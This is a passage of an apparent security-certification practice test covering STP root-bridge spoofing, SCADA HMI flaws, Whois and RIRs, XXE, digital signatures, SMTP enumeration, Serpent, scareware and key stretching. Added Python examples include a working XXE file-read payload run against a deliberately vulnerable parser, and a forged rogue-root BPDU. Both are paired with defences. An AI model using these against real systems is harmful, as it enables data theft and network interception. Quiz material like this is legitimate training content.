Application sandboxing https://en.wikipedia.org/wiki/Sandbox_(computer_security) A sandbox (including application sandboxing) is a security mechanism for separating running programs, usually in an effort to mitigate system failures and/or software vulnerabilities from spreading. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system. A sandbox typically provides a tightly controlled set of resources for guest programs to run in, such as storage and memory scratch space. Network access, the ability to inspect the host system, or reading from input devices are usually disallowed or heavily restricted.
Jailbreaking https://en.wikipedia.org/wiki/Jailbreaking_of_Apple_devices Jailbreaking refers to privilege escalation on an Apple device to remove software restrictions imposed by Apple on iOS operating systems. Typically it is done through a series of kernel patches. A jailbroken device permits root access within the operating system and provides the opportunity to install software not available through the iOS App Store. Different devices and versions are exploited with a variety of tools. Apple views jailbreaking as a violation of the end-user license agreement, and strongly cautions device owners against attempting to achieve root access through the exploitation of vulnerabilities.
Rooting https://en.wikipedia.org/wiki/Rooting_(Android) Rooting is the process of allowing users of the Android mobile operating system to attain privileged control (known as root access) over various Android subsystems. As Android is based on a modified version of the Linux kernel, rooting an Android device gives similar access to administrative (superuser) permissions as on Linux or any other Unix-like operating system such as FreeBSD or macOS.
Question 27 of 65
27. Question
Identify the wrong answer in terms of Range:
802.11a – 150 ft
802.11b – 150 ft
802.11n – 150 ft
802.16 (WiMax) – 30 miles
Question 28 of 65
28. Question
Ivan, the black hat hacker, plugged a rogue switch into an unused port in the LAN with a priority lower than any other switch in the network, so that he could make it the root bridge, which would later allow him to sniff all the traffic in the target’s network. What attack did Ivan perform?
Correct
https://howdoesinternetwork.com/2012/stp-attack
An STP attack involves an attacker spoofing the root bridge in the topology. The attacker broadcasts out an STP configuration/topology change BPDU in an attempt to force an STP recalculation. The BPDU sent out announces that the attacker’s system has a lower bridge priority. The attacker can then see a variety of frames forwarded from other switches to it. STP recalculation may also cause a denial-of-service (DoS) condition on the network by causing an interruption of 30 to 45 seconds each time the root bridge changes.
Incorrect answers:
ARP spoofing attack https://en.wikipedia.org/wiki/ARP_spoofing
ARP spoofing, ARP cache poisoning, or ARP poison routing, is a technique by which an attacker sends (spoofed) Address Resolution Protocol (ARP) messages onto a local area network. Generally, the aim is to associate the attacker’s MAC address with the IP address of another host, such as the default gateway, causing any traffic meant for that IP address to be sent to the attacker instead.
DNS poisoning attack https://en.wikipedia.org/wiki/DNS_spoofing
DNS spoofing, also referred to as DNS cache poisoning, is a form of computer security hacking in which corrupt Domain Name System data is introduced into the DNS resolver’s cache, causing the name server to return an incorrect result record, e.g. an IP address. This results in traffic being diverted to the attacker’s computer (or any other computer).
VLAN hopping https://en.wikipedia.org/wiki/VLAN_hopping
VLAN hopping is a computer security exploit, a method of attacking networked resources on a virtual LAN (VLAN). The basic concept behind all VLAN hopping attacks is for an attacking host on a VLAN to gain access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping: switch spoofing and double tagging. Both attack vectors can be mitigated with proper switch port configuration.
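The root election that Ivan abuses is decided purely by the 8-byte Bridge ID (2-byte priority followed by the base MAC): the numerically lowest ID wins. The following Python is an added example, not code from the practice test or from the linked article. It builds an 802.1D configuration BPDU the way Ivan’s rogue switch would (priority 4096 against the default 32768), parses it back, and emulates the two switch-port protections that stop this attack, BPDU guard (an access port must never receive a BPDU) and root guard (a BPDU that advertises a root better than the known root). The MAC addresses and priorities are constructed sample values; the detector is a simplification of what the switch features do, written for illustration.

```python
import struct

# IEEE 802.1D configuration BPDU payload (35 bytes, follows the LLC header):
# protocol id (2) | version (1) | type (1) | flags (1) | root bridge id (8) |
# root path cost (4) | sender bridge id (8) | port id (2) | message age (2) |
# max age (2) | hello time (2) | forward delay (2)   -- timers in 1/256 s units
BPDU_FMT = "!HBBB8sI8sHHHHH"
BPDU_LEN = struct.calcsize(BPDU_FMT)   # 35
CONFIG_BPDU = 0x00
DEFAULT_PRIORITY = 32768               # factory default on most switches


def bridge_id(priority: int, mac: str) -> bytes:
    """Bridge ID = 2-byte priority followed by the 6-byte base MAC.
    Bytes compare like a big-endian integer, and the LOWEST ID wins the root election."""
    return struct.pack("!H", priority) + bytes.fromhex(mac.replace(":", ""))


def build_config_bpdu(root_priority: int, root_mac: str,
                      sender_priority: int, sender_mac: str,
                      root_path_cost: int = 0, port_id: int = 0x8001) -> bytes:
    """Serialize a configuration BPDU; a rogue switch claims itself as root (cost 0)."""
    return struct.pack(BPDU_FMT, 0x0000, 0x00, CONFIG_BPDU, 0x00,
                       bridge_id(root_priority, root_mac), root_path_cost,
                       bridge_id(sender_priority, sender_mac), port_id,
                       0, 20 * 256, 2 * 256, 15 * 256)   # age, max age, hello, fwd delay


def parse_config_bpdu(raw: bytes) -> dict:
    """Decode the fields a monitoring tool needs; raises on anything that is not a config BPDU."""
    proto, version, btype, flags, root, cost, sender, port, age, max_age, hello, fwd = \
        struct.unpack(BPDU_FMT, raw[:BPDU_LEN])
    if proto != 0 or btype != CONFIG_BPDU:
        raise ValueError("not an 802.1D configuration BPDU")
    return {
        "root_id": root,
        "root_priority": int.from_bytes(root[:2], "big"),
        "root_mac": root[2:].hex(":"),
        "root_path_cost": cost,
        "sender_priority": int.from_bytes(sender[:2], "big"),
        "sender_mac": sender[2:].hex(":"),
        "max_age_s": max_age / 256,
    }


def inspect_bpdu(raw: bytes, expected_root_id: bytes, access_port: bool) -> list:
    """Emulate BPDU guard and root guard; returns the alerts a switch or NIDS would raise."""
    alerts = []
    bpdu = parse_config_bpdu(raw)
    if access_port:
        alerts.append(f"bpdu-guard: BPDU from {bpdu['sender_mac']} on an access port; "
                      f"port should be err-disabled")
    if bpdu["root_id"] < expected_root_id:
        alerts.append(f"root-guard: superior root {bpdu['root_priority']}/{bpdu['root_mac']} "
                      f"advertised by {bpdu['sender_mac']}; would force an STP recalculation")
    return alerts


if __name__ == "__main__":
    # Constructed scenario: legitimate root at default priority, Ivan's switch at 4096.
    legit_root = bridge_id(DEFAULT_PRIORITY, "00:11:22:33:44:55")
    rogue = build_config_bpdu(4096, "de:ad:be:ef:00:01", 4096, "de:ad:be:ef:00:01")
    for alert in inspect_bpdu(rogue, legit_root, access_port=True):
        print(alert)
```

Note that both checks are about where the BPDU arrives and what it claims, not about who sent it: there is no authentication in STP, so the only practical defences are BPDU guard on every access port and root guard on the ports that face away from the real root.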
Question 29 of 65
29. Question
Black-hat hacker Ivan attacked the SCADA system of the industrial water facility. During the exploration process, he discovered that outdated equipment was being used, the human-machine interface (HMI) was directly connected to the Internet and did not have any security tools or authentication mechanism. This allowed Ivan to control the system and influence all processes (including water pressure and temperature). What category does this vulnerability belong to?
Correct
https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/the-state-of-scada-hmi-vulnerabilities
Most SCADA / ICS equipment has a dedicated system for managing and monitoring industrial systems. Most people in the industry call this a human-machine interface or HMI. This system is essential for managing industrial systems, but it can also be an important vector for attackers. If an attacker could endanger the HMI, the attacker owns your industrial network. These systems have been compromised in at least two ways: protocol attacks and HMI attacks.
The major areas where SCADA HMI software vulnerabilities occur, according to the Trend Micro analysis linked above, are, respectively:
– Memory corruption.
– Credential management.
– Lack of authentication/authorization and insecure defaults.
– Code injection.
– A big chunk of other areas.
Memory corruption
The vulnerabilities in this category are code security issues that include out-of-bounds read/write vulnerabilities and heap- and stack-based buffer overflow.
Credential management
Includes all vulnerabilities from not protecting credentials enough and storing passwords in a recoverable format to the use of hard-coded passwords.
Lack of authentication/authorization and insecure defaults
The vulnerabilities in this category include transmission of confidential information in cleartext, insecure defaults, missing encryption, and insecure ActiveX controls used for scripting.
NOTE: The situation in the question relates to this vulnerability because the problem is not just in a simple password or in its insecure storage, but in the complete absence of the authentication mechanism itself.
Code injection
The vulnerabilities in this category include common code injections such as SQL, OS, command, and some domain-specific injections.
Question 30 of 65
30. Question
Whois services allow you to get a massive amount of valuable information at the reconnaissance stage. Depending on the target’s location, they receive data from one of the five regional Internet registries (RIRs). Which of the following RIRs should the Whois service contact if you want to get information about an IP address registered in France?
Correct
https://en.wikipedia.org/wiki/Regional_Internet_registry
A regional Internet registry (RIR) is an organization that manages the allocation and registration of Internet number resources within a region of the world. Internet number resources include IP addresses and autonomous system (AS) numbers.
The regional Internet registry system evolved over time, eventually dividing the responsibility for management to a registry for each of five regions of the world. The regional Internet registries are informally liaised through the unincorporated Number Resource Organization (NRO), which is a coordinating body to act on matters of global importance.
· American Registry for Internet Numbers (ARIN) – United States, Canada and parts of the Caribbean
· RIPE Network Coordination Centre (RIPE NCC) – Europe, the Middle East and Central Asia
· Asia-Pacific Network Information Centre (APNIC) – the Asia-Pacific region
· Latin American and Caribbean Network Information Centre (LACNIC) – Latin America and parts of the Caribbean
· African Network Information Centre (AFRINIC) – Africa
France lies in the RIPE NCC service region, so a Whois lookup for an IP address registered in France is answered from the RIPE database (whois.ripe.net).
NOTE: Some countries also have national Internet registries (NIRs), which allocate addresses under their RIR; all of the NIRs listed below operate under APNIC https://en.wikipedia.org/wiki/National_Internet_registry
· The Japan Network Information Center (JPNIC)
· The Korea Internet & Security Agency (KISA/KRNIC)
· China Internet Network Information Center (CNNIC)
· Asosiasi Penyelenggara Jasa Internet Indonesia (APJII)
· Taiwan Network Information Center (TWNIC)
· Vietnam Internet Network Information Center (VNNIC)
· Indian Registry for Internet Names and Numbers (IRINN)
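During reconnaissance the raw Whois answer is what you actually have to work with, so the following Python is an added example (not code from the practice test) of the two halves of the job: the RFC 3912 exchange itself (TCP port 43, query terminated by CRLF, read until the server closes) and a parser for the RPSL-style output the RIPE NCC database returns, with a small summary of the fields a pentester wants (address range, netname, country, maintainers, announcing AS). The network function targets whois.ripe.net, the real RIPE NCC server, but is not exercised offline; the response text below is a constructed sample in RIPE format using the documentation prefix 192.0.2.0/24 and documentation ASN 64496, not real registry data, and the object names in it are invented.

```python
import socket

RIPE_WHOIS = "whois.ripe.net"   # RIPE NCC whois server (Europe, Middle East, Central Asia)


def query_whois(query: str, server: str = RIPE_WHOIS, port: int = 43, timeout: float = 10.0) -> str:
    """RFC 3912: open TCP/43, send the query followed by CRLF, read until the
    server closes the connection. Needs network access; not used by the offline demo."""
    with socket.create_connection((server, port), timeout=timeout) as sock:
        sock.sendall(query.encode("ascii") + b"\r\n")
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", errors="replace")


def parse_rpsl(text: str) -> list:
    """Split RPSL-style whois output into objects.

    Attributes are 'key: value' lines; objects are separated by blank lines;
    lines starting with '%' or '#' are server comments; '#' starts an
    end-of-line comment; a line starting with whitespace or '+' continues
    the previous attribute. Repeated keys (descr:, mnt-by:) become lists.
    """
    objects, current, last_key = [], {}, None
    for line in text.splitlines():
        if line.startswith(("%", "#")):
            continue
        if not line.strip():
            if current:
                objects.append(current)
            current, last_key = {}, None
            continue
        if line[0] in " \t+" and last_key:
            current[last_key][-1] += " " + line.lstrip(" \t+").split("#", 1)[0].strip()
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.split("#", 1)[0].strip()
        current.setdefault(key, []).append(value)
        last_key = key
    if current:
        objects.append(current)
    return objects


def recon_summary(objects: list) -> dict:
    """Pull the attributes that matter for footprinting out of a RIPE answer."""
    summary = {}
    for obj in objects:
        if "inetnum" in obj:
            summary["range"] = obj["inetnum"][0]
            summary["netname"] = obj.get("netname", [""])[0]
            summary["country"] = obj.get("country", [""])[0]
            summary["maintainers"] = obj.get("mnt-by", [])
        elif "route" in obj:
            summary["prefix"] = obj["route"][0]
            summary["origin_as"] = obj.get("origin", [""])[0]
    return summary


# Constructed sample in RIPE Database (RPSL) format; not real registry data.
SAMPLE_RIPE_RESPONSE = """\
% Constructed sample in RIPE Database (RPSL) format, not real registry data.

inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-NET-FR
descr:          Example SA
                Paris office
country:        FR
admin-c:        EX123-RIPE
status:         ASSIGNED PA
mnt-by:         EXAMPLE-MNT
mnt-by:         EXAMPLE-ISP-MNT
source:         RIPE # Filtered

route:          192.0.2.0/24
descr:          Example SA
origin:         AS64496
mnt-by:         EXAMPLE-ISP-MNT
source:         RIPE # Filtered
"""

if __name__ == "__main__":
    # Live use would be: parse_rpsl(query_whois("192.0.2.1"))
    print(recon_summary(parse_rpsl(SAMPLE_RIPE_RESPONSE)))
```

Querying the wrong RIR is not fatal in practice, because the registries refer you onward, but going straight to the regional database avoids the referral hop and returns the richer object set (inetnum, route, person/role contacts) that the summary function picks from.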
Question 31 of 65
31. Question
Have you spent a lot of time and money on creating photo materials for your business? You probably don’t want anyone else to use them. But you don’t need to hire a cool hacker to solve this problem. There is a reasonably simple method using search engines to search for photographs, profile pictures, and memes.
What method are we talking about?
Reverse image search is a content-based image retrieval (CBIR) query technique that involves providing the CBIR system with a sample image that it will then base its search upon; in terms of information retrieval, the sample image is what formulates a search query. In particular, reverse image search is characterized by a lack of search terms. This effectively removes the need for a user to guess at keywords or terms that may or may not return a correct result. Reverse image search also allows users to discover content that is related to a specific sample image, popularity of an image, and discover manipulated versions and derivative works.
Incorrect answers:
Google advanced search https://www.google.com/advanced_search
Google Advanced Search is a more detailed method of finding information on Google. It uses a variety of Google search operators, special characters and commands also known as advanced operators, that go beyond a normal Google search.
Metasearch engines https://en.wikipedia.org/wiki/Metasearch_engine
A metasearch engine (or search aggregator) is an online information retrieval tool that uses the data of a web search engine to produce its own results. Metasearch engines take input from a user and immediately query search engines for results. Sufficient data is gathered, ranked, and presented to the users.
Google dorking https://en.wikipedia.org/wiki/Google_hacking
Google hacking, also named Google dorking, is a hacker technique that uses Google Search and other Google applications to find security holes in the configuration and computer code that websites are using. Google dorking could also be used for OSINT.
Question 32 of 65
32. Question
In which of the following attacks is the line above injected?
Correct
https://portswigger.net/web-security/xxe
XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application’s processing of XML data. It often allows an attacker to view files on the application server filesystem and interact with any back-end or external systems that the application can access.
In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other back-end infrastructure by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.
Incorrect answers:
SQLi https://en.wikipedia.org/wiki/SQL_injection
SQL injection is a code injection technique used to attack data-driven applications, in which malicious SQL statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker). SQL injection must exploit a security vulnerability in an application’s software, for example, when user input is either incorrectly filtered for string literal escape characters embedded in SQL statements or user input is not strongly typed and unexpectedly executed. SQL injection is mostly known as an attack vector for websites but can be used to attack any type of SQL database.
SQL injection attacks allow attackers to spoof identity, tamper with existing data, cause repudiation issues such as voiding transactions or changing balances, allow the complete disclosure of all data on the system, destroy the data or make it otherwise unavailable, and become administrators of the database server.
XSS https://en.wikipedia.org/wiki/Cross-site_scripting
Cross-site scripting (XSS) is a type of security vulnerability that can be found in some web applications. XSS attacks enable attackers to inject client-side scripts into web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy. XSS effects vary in range from petty nuisance to significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site’s owner network.
IDOR https://portswigger.net/web-security/access-control/idor
Insecure direct object references (IDOR) are a type of access control vulnerability that arises when an application uses user-supplied input to access objects directly. However, it is just one example of many access control implementation mistakes that can lead to access controls being circumvented. IDOR vulnerabilities are most commonly associated with horizontal privilege escalation, but they can also arise in relation to vertical privilege escalation.
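The mechanism behind the file-read in the explanation is that the parser hands the attacker-controlled SYSTEM identifier to an entity resolver, and a naive resolver opens it. The following Python is an added example, not code from the practice test or from the PortSwigger article: it builds a constructed XXE payload (not the line the question refers to), feeds it to the standard-library expat parser once with a resolver that behaves like a vulnerable one and once hardened by rejecting any DOCTYPE (the same approach the defusedxml library takes with its forbid_dtd option), and shows that the first leaks a planted secret while the second refuses the document. The order/data element names, the secret and the temporary file are constructed for the demo.

```python
import os
import tempfile
import xml.parsers.expat


def build_xxe_document(system_id: str) -> str:
    """Constructed XXE payload: the internal DTD subset declares an external
    general entity whose SYSTEM identifier points at a local file, and the
    body references it, so a resolving parser splices the file into <data>."""
    return (
        '<?xml version="1.0"?>'
        f'<!DOCTYPE order [<!ENTITY xxe SYSTEM "{system_id}">]>'
        "<order><data>&xxe;</data></order>"
    )


def parse_order(doc: str, hardened: bool) -> str:
    """Return the text content of the parsed document.

    hardened=False installs a resolver that opens whatever SYSTEM identifier
    the document supplies (the XXE bug). hardened=True rejects any DOCTYPE,
    so no entity can be declared in the first place.
    """
    parser = xml.parsers.expat.ParserCreate()
    text_parts = []
    parser.CharacterDataHandler = text_parts.append   # collects text from parent and child parsers

    if hardened:
        def forbid_dtd(name, system_id, public_id, has_internal_subset):
            raise ValueError(f"DOCTYPE '{name}' rejected: DTDs are not allowed")
        parser.StartDoctypeDeclHandler = forbid_dtd
    else:
        def resolve_external(context, base, system_id, public_id):
            # Vulnerable resolver: treat the identifier as a local path and read it.
            path = system_id[len("file://"):] if system_id.startswith("file://") else system_id
            child = parser.ExternalEntityParserCreate(context)   # inherits the handlers
            with open(path, "rb") as fh:
                child.Parse(fh.read(), True)
            return 1
        parser.ExternalEntityRefHandler = resolve_external

    parser.Parse(doc, True)
    return "".join(text_parts)


def demo() -> dict:
    """Plant a secret in a temp file and parse the payload both ways."""
    fd, path = tempfile.mkstemp()
    with os.fdopen(fd, "w") as fh:
        fh.write("s3cr3t-api-token")          # constructed secret
    try:
        doc = build_xxe_document("file://" + path)
        leaked = parse_order(doc, hardened=False)
        try:
            parse_order(doc, hardened=True)
            blocked = False
        except ValueError:
            blocked = True
    finally:
        os.unlink(path)
    return {"leaked": leaked, "blocked": blocked}


if __name__ == "__main__":
    print(demo())
```

Refusing the DOCTYPE is the robust fix because it removes both external entities and the internal-entity expansion bombs in one go; merely not resolving external references still leaves the parser open to the latter, and to an SSRF-style resolver if anyone later adds one.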
Question 33 of 65
33. Question
John sends an email to his colleague Angela and wants to ensure that the message will not be changed during the delivery process. He creates a checksum of the message and encrypts it using asymmetric cryptography. What key did John use to encrypt the checksum?
Correct
The correct answer is:
A. His own private key
Here’s why:
Checksum: John creates a checksum (a hash) of the message so that any alteration in transit can be detected.
Asymmetric Cryptography: He encrypts that checksum with one key of a public-private key pair. Encrypting a hash with the sender’s own private key is exactly what a digital signature is.
Explanation:
In asymmetric cryptography, whatever one key of the pair encrypts, only the other key of the pair can decrypt. Which key you choose decides the property you get: encrypting with the recipient’s public key gives confidentiality (only the recipient can read it); encrypting with your own private key gives integrity and authenticity (anyone can check it, but only you could have produced it).
Checksum Encryption: John encrypts the checksum with his own private key. Anyone who holds John’s public key, including Angela, can decrypt it, but nobody without John’s private key can produce it.
Message Integrity: Upon receiving the email, Angela decrypts the checksum with John’s public key, computes the checksum of the message she received and compares the two. If they match, the message was not changed during delivery, and it really came from John. An attacker who alters the message cannot replace the encrypted checksum to match, because doing so requires John’s private key.
Incorrect Options:
B. Angela’s public key: This only keeps the checksum confidential; it does not protect integrity. Angela’s public key is public, so an attacker who modifies the message in transit can simply compute the checksum of the modified message, encrypt it with Angela’s public key and substitute it. Angela’s comparison would then succeed on the tampered message.
C. Angela’s private key: John does not have Angela’s private key; a private key never leaves its owner.
D. His own public key: Only John’s own private key could decrypt the result, so Angela could not recover the checksum at all.
By encrypting the checksum with his own private key, John produces a signature that Angela verifies with his public key; that is what guarantees the message was not modified on the way.
Question 34 of 65
34. Question
John, a black hat hacker, is trying to perform SMTP enumeration. What useful information can John gather during a Simple Mail Transfer Protocol enumeration?
Correct
https://info-savvy.com/what-is-enumeration/ SMTP is a service that can be found in most infrastructure penetration tests. It can help the penetration tester perform username enumeration via the EXPN and VRFY commands if the system administrator has not disabled them. EXPN reveals the actual addresses behind user aliases and mailing lists, and VRFY confirms the existence of valid user names. SMTP enumeration can be performed manually with utilities like telnet and netcat, or automatically with tools like Metasploit, Nmap and smtp-user-enum.
Question 35 of 65
35. Question
Which of the following algorithms is a symmetric key block cipher with a block size of 128 bits representing a 32-round SP-network operating on a block of four 32-bit words?
Correct
https://en.wikipedia.org/wiki/Serpent_(cipher) Serpent is a symmetric key block cipher that was a finalist in the Advanced Encryption Standard (AES) contest, where it was ranked second to Rijndael. Serpent was designed by Ross Anderson, Eli Biham, and Lars Knudsen. Like other AES submissions, Serpent has a block size of 128 bits and supports a key size of 128, 192 or 256 bits. The cipher is a 32-round substitution-permutation network operating on a block of four 32-bit words. Each round applies one of eight 4-bit to 4-bit S-boxes 32 times in parallel. Serpent was designed so that all operations can be executed in parallel, using 32-bit slices. This maximizes parallelism, but also allows use of the extensive cryptanalysis work performed on DES.
Incorrect answers:
CAST-128 https://en.wikipedia.org/wiki/CAST-128 CAST-128 is a 12- or 16-round Feistel network with a 64-bit block size and a key size of between 40 and 128 bits.
RC4 https://en.wikipedia.org/wiki/RC4 RC4 (Rivest Cipher 4, also known as ARC4 or ARCFOUR, meaning Alleged RC4) is a stream cipher, not a block cipher.
SHA-256 https://en.wikipedia.org/wiki/SHA-2 SHA-2 (Secure Hash Algorithm 2) is a set of cryptographic hash functions designed by the United States National Security Agency (NSA) and first published in 2001. The SHA-2 family consists of six hash functions with digests (hash values) that are 224, 256, 384 or 512 bits: SHA-224, SHA-256, SHA-384, SHA-512, SHA-512/224, SHA-512/256.
Question 36 of 65
36. Question
Which of the following is an example of a scareware social engineering attack?
Correct
https://en.wikipedia.org/wiki/Scareware It's a very simple question, but nevertheless you may meet a similar one on the exam, so you have to be ready for it. Scareware refers to scam tactics and fake software applications that cybercriminals use to incite feelings of panic and fear. They do this to get users to make irrational split-second decisions and to trick them into:
– Buying worthless software;
– Downloading different types of malicious software;
– Visiting websites that auto-download and install malicious software onto their devices.
Scareware scammers use social engineering tactics and language that create a sense of urgency to compel their targets to act. They frequently rely on pop-ups designed to look like antivirus alerts. In some cases, the messages can take over part (or all) of the target's screen. In general, scareware messages are associated with fake antivirus software and tech support scams. They falsely notify people that their devices (computer, tablet, mobile phone) are infected with various types of malware.
Question 37 of 65
37. Question
You need to increase the security of keys used for encryption and authentication. For these purposes, you decide to use a technique to enter an initial key to an algorithm that generates an enhanced key resistant to brute-force attacks. Which of the following techniques will you use?
Correct
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements; these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the same effort for each attempt. If this added effort compares to a brute-force key search of all keys with a certain key length, then the input key may be described as stretched by that same length.
Key stretching leaves an attacker with two options:
– Attempt possible combinations of the enhanced key, but this is infeasible if the enhanced key is sufficiently long and unpredictable (i.e., the algorithm mimics randomness well enough that the attacker must trial the entire stretched key space).
– Attempt possible combinations of the weaker initial key, potentially commencing with a dictionary attack if the initial key is a password or passphrase, but the attacker's added effort for each trial could render the attack uneconomic should the costlier computation and memory consumption outweigh the expected profit.
If the attacker uses the same class of hardware as the user, each guess will take a similar amount of time to process as it took the user (for example, one second). Even if the attacker has much greater computing resources than the user, the key stretching will still slow the attacker down while not seriously affecting the usability of the system for any legitimate user. This is because the user's computer only has to compute the stretching function once upon the user entering their password, whereas the attacker must compute it for every guess in the attack. This process does not alter the original key-space entropy. The key stretching algorithm is deterministic, allowing a weak input to always generate the same enhanced key, but therefore limiting the enhanced key to no more possible combinations than the input key space. Consequently, the scheme remains vulnerable if unprotected against certain time-memory tradeoffs such as developing rainbow tables to target multiple instances of the enhanced key space in parallel (effectively a shortcut to repeating the algorithm). For this reason, key stretching is often combined with salting.
Incorrect answers:
KDF https://en.wikipedia.org/wiki/Key_derivation_function A key derivation function (KDF) is a cryptographic hash function that derives one or more secret keys from a secret value such as the main key, a password, or a passphrase using a pseudorandom function. KDFs can be used to stretch keys into longer keys or to obtain keys of a required format, such as converting a group element that is the result of a Diffie-Hellman key exchange into a symmetric key for use with AES. Keyed cryptographic hash functions are popular examples of pseudorandom functions used for key derivation.
PKI https://en.wikipedia.org/wiki/Public_key_infrastructure A public key infrastructure (PKI) is a set of roles, policies, hardware, software and procedures needed to create, manage, distribute, use, store and revoke digital certificates and manage public-key encryption. The purpose of a PKI is to facilitate the secure electronic transfer of information for a range of network activities such as e-commerce, internet banking and confidential email. It is required for activities where simple passwords are an inadequate authentication method and more rigorous proof is required to confirm the identity of the parties involved in the communication and to validate the information being transferred. In cryptography, a PKI is an arrangement that binds public keys with respective identities of entities (like people and organizations). The binding is established through a process of registration and issuance of certificates at and by a certificate authority (CA). Depending on the assurance level of the binding, this may be carried out by an automated process or under human supervision. When done over a network, this requires using a secure certificate enrollment or certificate management protocol such as CMP.
Key reinstallation https://en.wikipedia.org/wiki/KRACK KRACK ("Key Reinstallation Attack") is a replay attack (a type of exploitable flaw) on the Wi-Fi Protected Access protocol that secures Wi-Fi connections. It was discovered in 2016 by the Belgian researchers Mathy Vanhoef and Frank Piessens of the University of Leuven. Vanhoef's research group published details of the attack in October 2017. By repeatedly resetting the nonce transmitted in the third step of the WPA2 handshake, an attacker can gradually match encrypted packets seen before and learn the full keychain used to encrypt the traffic. The weakness is exhibited in the Wi-Fi standard itself, and not due to errors in the implementation of a sound standard by individual products or implementations. Therefore, any correct implementation of WPA2 is likely to be vulnerable. The vulnerability affects all major software platforms, including Microsoft Windows, macOS, iOS, Android, Linux, OpenBSD and others. The security protocol protecting many Wi-Fi devices can essentially be bypassed, potentially allowing an attacker to intercept sent and received data.
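The loop-plus-salt construction the explanation describes, as an added example that is not part of the quiz or its cited sources: PBKDF2-HMAC-SHA256 from Python's standard library stretches a password with a configurable iteration count, stores a per-user random salt beside the enhanced key, verifies with a constant-time compare, and checks itself against a widely published PBKDF2-HMAC-SHA256 test vector. The sample password and the two fixed salts are constructed values.

```python
import hashlib
import hmac
import os
import time

HASH_NAME = "sha256"
KEY_LEN = 32  # bytes of enhanced key to derive


def stretch_key(password: bytes, salt: bytes, iterations: int) -> bytes:
    """Turn a weak input key into an enhanced key.

    PBKDF2 applies HMAC-SHA256 `iterations` times in a loop. There is no
    known shortcut from (password, salt) to the output, so every guess
    costs an attacker the same work the legitimate verifier spends once.
    """
    return hashlib.pbkdf2_hmac(HASH_NAME, password, salt, iterations, dklen=KEY_LEN)


def enroll(password: bytes, iterations: int = 600_000) -> dict:
    """Store what a verifier needs: a fresh random salt, the iteration
    count and the enhanced key. The password itself is never stored."""
    salt = os.urandom(16)
    return {
        "salt": salt,
        "iterations": iterations,
        "key": stretch_key(password, salt, iterations),
    }


def verify(record: dict, candidate: bytes) -> bool:
    """Recompute the stretch once for the user and compare in constant time,
    so a mismatch does not leak how many leading bytes were right."""
    derived = stretch_key(candidate, record["salt"], record["iterations"])
    return hmac.compare_digest(derived, record["key"])


def salt_separates_keys(password: bytes, iterations: int) -> bool:
    """True when one password stretched under two salts gives unrelated
    enhanced keys: a table precomputed for one salt says nothing about
    another, which is why stretching is combined with salting."""
    k_a = stretch_key(password, b"salt-A-constructed", iterations)
    k_b = stretch_key(password, b"salt-B-constructed", iterations)
    return k_a != k_b


# Published PBKDF2-HMAC-SHA256 vector: P="password", S="salt", c=1, dkLen=32.
KNOWN_ANSWER = bytes.fromhex(
    "120fb6cffcf8b32c43e7225256c4f837a86548c92ccc35480805987cb70be17b"
)


def known_answer_ok() -> bool:
    """Sanity check that stretch_key really is PBKDF2-HMAC-SHA256."""
    return stretch_key(b"password", b"salt", 1) == KNOWN_ANSWER


def seconds_for(password: bytes, salt: bytes, iterations: int) -> float:
    """Wall-clock cost of one derivation; the attacker pays this per guess."""
    start = time.perf_counter()
    stretch_key(password, salt, iterations)
    return time.perf_counter() - start


if __name__ == "__main__":
    pw = b"correct horse"  # constructed sample password
    rec = enroll(pw, iterations=200_000)
    print("known-answer vector :", known_answer_ok())
    print("verify correct      :", verify(rec, pw))
    print("verify wrong        :", verify(rec, b"wrong horse"))
    print("salt separates keys :", salt_separates_keys(pw, 1_000))
    for n in (1_000, 100_000):
        print(f"{n:>7} iterations  : {seconds_for(pw, rec['salt'], n):.4f} s")
```

Raising the iteration count multiplies the per-guess cost for an attacker while the legitimate user pays it only once per login; the salt is what keeps a single precomputed table from covering every user at once.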
Incorrect
https://en.wikipedia.org/wiki/Key_stretching Key stretching techniques are used to make a possibly weak key, typically a password or passphrase, more secure against a brute-force attack by increasing the resources (time and possibly space) it takes to test each possible key. Passwords or passphrases created by humans are often short or predictable enough to allow password cracking, and key stretching is intended to make such attacks more difficult by complicating a basic step of trying a single password candidate. Key stretching also improves security in some real-world applications where the key length has been constrained, by mimicking a longer key length from the perspective of a brute-force attacker. There are several ways to perform key stretching. One way is to apply a cryptographic hash function or a block cipher repeatedly in a loop. For example, in applications where the key is used for a cipher, the key schedule in the cipher may be modified so that it takes a specific length of time to perform. Another way is to use cryptographic hash functions that have large memory requirements these can be effective in frustrating attacks by memory-bound adversaries. Key stretching algorithms depend on an algorithm that receives an input key and then expends considerable effort to generate a stretched cipher (called an enhanced key[citation needed]) mimicking randomness and longer key length. The algorithm must have no known shortcut, so the most efficient way to relate the input and cipher is to repeat the key stretching algorithm itself. This compels brute-force attackers to expend the 